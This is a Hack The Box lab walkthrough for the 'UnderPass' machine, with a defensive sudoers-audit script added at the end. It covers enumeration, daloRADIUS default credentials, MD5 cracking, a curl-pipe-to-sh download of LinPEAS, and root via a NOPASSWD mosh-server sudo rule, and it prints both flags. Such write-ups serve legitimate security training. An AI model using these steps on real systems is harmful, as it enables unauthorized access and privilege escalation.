HTB UnderPass Writeup (Walkthrough)
Introduction
This writeup documents the process of compromising the “UnderPass” machine from Hack The Box. The machine features a web application with default credentials, an exploitable daloRADIUS installation, and a privilege escalation path through mosh-server.
INFO
- Machine IP = 10.10.11.48
- OS = Linux
- Level = EASY
- Points = 20
Enumeration
Nmap Scan
The first step was to conduct a port scan using Nmap to identify open services:
nmap -sC -sV -oA UnderPass_TCP 10.10.11.48
Results:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 14:04 EDT
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan revealed two open ports:
- Port 22: SSH service (OpenSSH 8.9p1)
- Port 80: HTTP service (Apache 2.4.52)
SNMP Enumeration
SNMP was checked to gather additional system information:
snmp-check 10.10.11.48
The SNMP enumeration revealed useful information:
[+] Try to connect to 10.10.11.48:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.10.11.48
Hostname : UnDerPass.htb is the only daloradius server in the basin!
Description : Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Contact : [email protected]
Location : Nevada, U.S.A. but not Vegas
Uptime snmp : 00:20:09.07
Uptime system : 00:19:58.73
System date : 2025-4-21 18:05:56.0
The SNMP information revealed:
- The hostname suggests a daloRADIUS server is running
- The contact email: [email protected]
- System details suggesting it’s an Ubuntu machine
Web Application Enumeration
Based on the SNMP information, I used Gobuster to look for web directories, specifically focusing on the daloRADIUS application:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://underpass.htb/daloradius/
Results showed various directories:
/library (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/library/]
/doc (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/doc/]
/app (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/app/]
/contrib (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/contrib/]
/ChangeLog (Status: 200) [Size: 24703]
/setup (Status: 301) [Size: 325] [--> http://underpass.htb/daloradius/setup/]
/LICENSE (Status: 200) [Size: 18011]
/FAQS (Status: 200) [Size: 1428]
Then I focused on the /app directory:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://underpass.htb/daloradius/app
Results:
/common (Status: 301) [Size: 330] [--> http://underpass.htb/daloradius/app/common/]
/users (Status: 301) [Size: 329] [--> http://underpass.htb/daloradius/app/users/]
/operators (Status: 301) [Size: 333] [--> http://underpass.htb/daloradius/app/operators/]
Initial Access
daloRADIUS Login
Through research, I found that daloRADIUS typically uses default credentials:
- Username: administrator
- Password: radius
These credentials could be used at http://underpass.htb/daloradius/login.php.
Password Cracking
During exploration of the daloRADIUS application, I found an MD5 hash:
412DD4759978ACFCC81DEAB01B382403
I saved this hash to a file and used John the Ripper to crack it:
echo "412DD4759978ACFCC81DEAB01B382403" >> hash_pass.txt
john hash_pass.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
The hash was successfully cracked:
underwaterfriends (?)
User Access
Using the credentials obtained (likely username: svcMosh, password: underwaterfriends), I established an SSH connection:
ssh [email protected]
After successful login, I was able to read the user flag:
svcMosh@underpass:~$ cat user.txt
0b07d919fbe687f005d1fdc87bd9350c
Privilege Escalation
Enumeration with LinPEAS
I attempted to download LinPEAS directly on the target machine, but faced network connectivity issues:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
curl: (6) Could not resolve host: github.com
So I downloaded LinPEAS to my local machine and then transferred it to the target:
# On local machine
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
scp linpeas.sh [email protected]:/tmp/
# On target machine
chmod +x linpeas.sh
./linpeas.sh
Sudo Permissions
I checked available sudo permissions:
sudo -l
Results:
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
This showed that the user svcMosh can run /usr/bin/mosh-server with sudo privileges without a password.
Exploiting mosh-server
After exploring the mosh command options, I found a way to leverage the sudo permission to gain root access:
mosh --server="sudo /usr/bin/mosh-server" localhost
This command executes mosh-server with sudo privileges, giving us a root shell:
root@underpass:~# cat root.txt
4076d358022740f6537c6d9e8d5a5d29
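The sudo rule above is dangerous because mosh-server starts the caller's login shell under whatever uid it runs as, so NOPASSWD on it is a passwordless root shell. As an added example (not part of the original writeup), here is a small POSIX sh audit that scans a sudoers-style file for NOPASSWD rules on such shell-spawning binaries; the SHELL_SPAWNERS list and the sample sudoers fragment are assumptions constructed for this example, and the parser deliberately ignores aliases, Defaults and include directives.

```shell
#!/bin/sh
# Added example: flag NOPASSWD sudo rules on commands that hand the caller a
# shell. mosh-server is one such command (it forks the user's shell as the uid
# it runs under). SHELL_SPAWNERS is an assumed, deliberately short list.
SHELL_SPAWNERS="mosh-server"

# audit_sudoers FILE: print one "RISK <user> NOPASSWD <cmd>" line per rule whose
# command basename is in SHELL_SPAWNERS. Comment lines are skipped. Only plain
# "user HOST=(RUNAS) NOPASSWD: cmd, cmd" rules are understood (no aliases).
audit_sudoers() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD' | while IFS= read -r line; do
        user=$(printf '%s\n' "$line" | awk '{print $1}')
        # Everything after "NOPASSWD:" is a comma-separated command list.
        printf '%s\n' "${line#*NOPASSWD:}" | tr ',' '\n' | while IFS= read -r cmd; do
            # Keep only the command path: drop leading blanks and any arguments.
            cmd=$(printf '%s' "$cmd" | sed 's/^[[:space:]]*//; s/[[:space:]].*$//')
            for s in $SHELL_SPAWNERS; do
                if [ "${cmd##*/}" = "$s" ]; then
                    printf 'RISK %s NOPASSWD %s\n' "$user" "$cmd"
                fi
            done
        done
    done
}

# demo_audit: run the audit over a constructed sudoers fragment that reproduces
# the rule sudo -l showed on the box, plus a benign rule that must not be flagged.
demo_audit() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
# constructed sample, not the target's real /etc/sudoers
svcMosh ALL=(ALL) NOPASSWD: /usr/bin/mosh-server
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar
EOF
    audit_sudoers "$tmp"
    rm -f "$tmp"
}

demo_audit
```

Running it against /etc/sudoers and each file in /etc/sudoers.d is the practical check; the fix on a box like this is to drop the rule entirely rather than to narrow it, since mosh-server has no safe argument set when run as root.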
Conclusion
This machine was compromised through:
- Reconnaissance: Using Nmap and SNMP to discover services and information
- Web Application Enumeration: Finding the daloRADIUS installation
- Credential Discovery: Identifying default credentials and cracking a hash
- Privilege Escalation: Exploiting sudo permissions for the mosh-server
The machine demonstrates the risks of:
- Using default credentials
- Exposing SNMP with public community strings
- Insecure sudo configurations
Flags:
- User: 0b07d919fbe687f005d1fdc87bd9350c
- Root: 4076d358022740f6537c6d9e8d5a5d29
Done!